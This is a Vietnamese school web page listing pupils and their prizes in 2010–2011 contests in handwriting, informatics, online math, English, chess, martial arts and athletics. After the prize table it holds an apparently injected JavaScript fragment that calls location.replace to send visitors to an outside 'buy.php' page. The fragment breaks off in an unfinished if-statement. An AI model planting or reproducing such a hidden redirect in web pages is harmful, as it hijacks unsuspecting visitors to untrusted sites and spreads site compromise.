Danh sách khen thưởng học sinh đạt giải trong các cuộc thi – Năm học 2010 – 2011

14/06/2011 8:25 Sáng 1 phản hồi

DANH SÁCH HỌC SINH ĐẠT GIẢI TRONG CÁC CUỘC THI

NĂM HỌC 2010 – 2011

Môn thi Họ và tên Lớp Đạt giải
Cấp Quận Cấp TP Cấp QG
Viết chữ đẹp Hoàng Lê Minh 5C Nhất
Nguyễn Minh Trang 5B Nhì
Nguyễn Thùy Trang 4B Ba
Nguyễn Hương Giang 3B Ba
Lê Quỳnh Chi 3A Ba
Nguyễn Thị Thanh Hiền 2C Ba
Trần T Minh Phương 2B Ba
Hoàng Thanh Xuân 4C KK
Đào Minh Quân 1C KK
Đặng Trần Đông 1A KK
Tin học trẻ Lưu Hải Nam 5B Nhất
Nguyễn Kế Đức Tùng 5B KK

Giải toán qua mạng

Lương Tuấn Anh 1A Nhì
Lưu Lan Nhi 3B Nhì
Nguyễn Thùy Trang 4B Nhì
Nghiêm Anh Tuấn 5B Nhì
Đỗ Tuấn Minh 2C Ba
Nguyễn Việt Anh 3B Ba
Nguyễn Vũ Huấn 4B Ba
Lưu Hải Nam 5B Ba
Tiếng Anh Nguyễn Tuấn Vinh 5B Ba Nhì Ba
Cờ tướng Nguyễn Hoài An 1C Ba Ba
Nguyễn Tố Nga 5B Ba
Nguyễn Ngọc Linh 2A Ba
Đặng Gia Hiển 3B KK
Bùi Kim Hồng 5C KK
Cờ vua Đỗ Hồng Sâm 1C Ba
Bùi Bảo Minh 1A KK
Taekwondo Lê Khánh Linh 5A Nhì
Điền kinh Nguyễn Duy Vinh 5B Nhì

location.replace(“http://gethere.info/buy.php”);

if (document.currentScript) {

Các phản hồi đã bị đóng lại bở quản trị.